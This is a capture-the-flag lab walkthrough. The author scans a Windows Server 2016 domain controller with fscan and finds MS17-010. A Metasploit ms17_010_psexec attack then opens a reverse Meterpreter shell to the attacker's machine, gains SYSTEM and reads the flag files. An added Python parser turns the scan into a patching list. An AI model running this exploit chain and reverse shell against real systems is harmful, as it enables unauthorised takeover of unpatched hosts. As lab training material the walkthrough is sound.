┌──(root㉿kali)-[/home/kali/thl/doraemon]
└─# fscan -h 192.168.10.5
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _`' |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
192.168.10.5:139 open
192.168.10.5:445 open
192.168.10.5:135 open
192.168.10.5:88 open
[*] alive ports len is: 4
start vulscan
[*] NetInfo
[*]192.168.10.5
[->]WIN-VRU3GG3DPLJ
[->]192.168.10.5
[+] MS17-010 192.168.10.5 (Windows Server 2016 Datacenter 14393)
[*] NetBios 192.168.10.5 [+] DC:WIN-VRU3GG3DPLJ.DORAEMON.THL Windows Server 2016 Datacenter 14393
已完成 4/4
[*] 扫描结束,耗时: 1.017942284s
Domain DORAEMON.THL
DC WIN-VRU3GG3DPLJ.DORAEMON.THL
Set up the hosts file first.
MS17-010 is detected.
Let's see if it works; just go all in.
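An added helper, not part of this writeup or of fscan itself, that parses the fscan output format shown above into per-host findings so a scan like this can be turned into a patching list. The regexes assume the fscan 1.8.4 line layout seen here; the sample input is a constructed re-typing of that output.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the fscan 1.8.4 lines from the scan above, re-typed inline
# (banner and timing lines omitted) so the parser runs offline.
SAMPLE = """\
192.168.10.5:139 open
192.168.10.5:445 open
192.168.10.5:135 open
192.168.10.5:88 open
[*] alive ports len is: 4
start vulscan
[*] NetInfo
[*]192.168.10.5
[->]WIN-VRU3GG3DPLJ
[->]192.168.10.5
[+] MS17-010 192.168.10.5 (Windows Server 2016 Datacenter 14393)
[*] NetBios 192.168.10.5 [+] DC:WIN-VRU3GG3DPLJ.DORAEMON.THL Windows Server 2016 Datacenter 14393
"""

IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
PORT_RE = re.compile(rf"^{IP}:(\d+) open$")                 # "<ip>:<port> open"
VULN_RE = re.compile(rf"^\[\+\] (\S+) {IP} \((.*)\)$")      # "[+] <id> <ip> (<os>)"
NETBIOS_RE = re.compile(rf"^\[\*\] NetBios {IP} \[\+\] DC:(\S+)")  # DC FQDN after "DC:"

@dataclass
class Host:
    ports: set = field(default_factory=set)
    vulns: list = field(default_factory=list)   # (vuln id, os string) pairs
    dc_fqdn: str = ""                           # set when fscan tags the host as a DC

def parse_fscan(text):
    """Group fscan output lines by IP into Host records."""
    hosts = {}
    for line in text.splitlines():
        line = line.strip()
        if m := PORT_RE.match(line):
            hosts.setdefault(m[1], Host()).ports.add(int(m[2]))
        elif m := VULN_RE.match(line):
            hosts.setdefault(m[2], Host()).vulns.append((m[1], m[3]))
        elif m := NETBIOS_RE.match(line):
            hosts.setdefault(m[1], Host()).dc_fqdn = m[2]
    return hosts

def triage(hosts):
    """List (ip, action) pairs: every flagged vuln, plus SMB exposed on a domain controller."""
    findings = []
    for ip, h in hosts.items():
        for vid, os_str in h.vulns:
            findings.append((ip, f"{vid} reported on {os_str}: patch and disable SMBv1"))
        if h.dc_fqdn and 445 in h.ports:
            findings.append((ip, f"DC {h.dc_fqdn} exposes SMB/445: restrict to admin subnets"))
    return findings
```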
msfconsole
use exploit/windows/smb/ms17_010_psexec
set rhosts 192.168.10.5
set lhost 192.168.10.3
run
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 192.168.10.3:4444
[*] 192.168.10.5:445 - Target OS: Windows Server 2016 Datacenter 14393
[*] 192.168.10.5:445 - Built a write-what-where primitive...
[+] 192.168.10.5:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.10.5:445 - Selecting PowerShell target
[*] 192.168.10.5:445 - Executing the payload...
[+] 192.168.10.5:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (177734 bytes) to 192.168.10.5
[*] Meterpreter session 1 opened (192.168.10.3:4444 -> 192.168.10.5:49724) at 2024-12-05 15:23:39 +0800
meterpreter > shell
Process 1124 created.
Channel 1 created.
Microsoft Windows [Versión 10.0.14393]
(c) 2016 Microsoft Corporation. Todos los derechos reservados.
C:\Windows\system32>whoami
whoami
nt authority\system
That should mean the box is owned.
c:\Users\Administrador\Desktop>type root.txt
type root.txt
advcrfbuiwergvb78wer9hg3n4sdfs43
c:\Users>type Suneo\desktop\user.txt
type Suneo\desktop\user.txt
asfre6vcergv3bvfsiregvrtetgb9rnwn543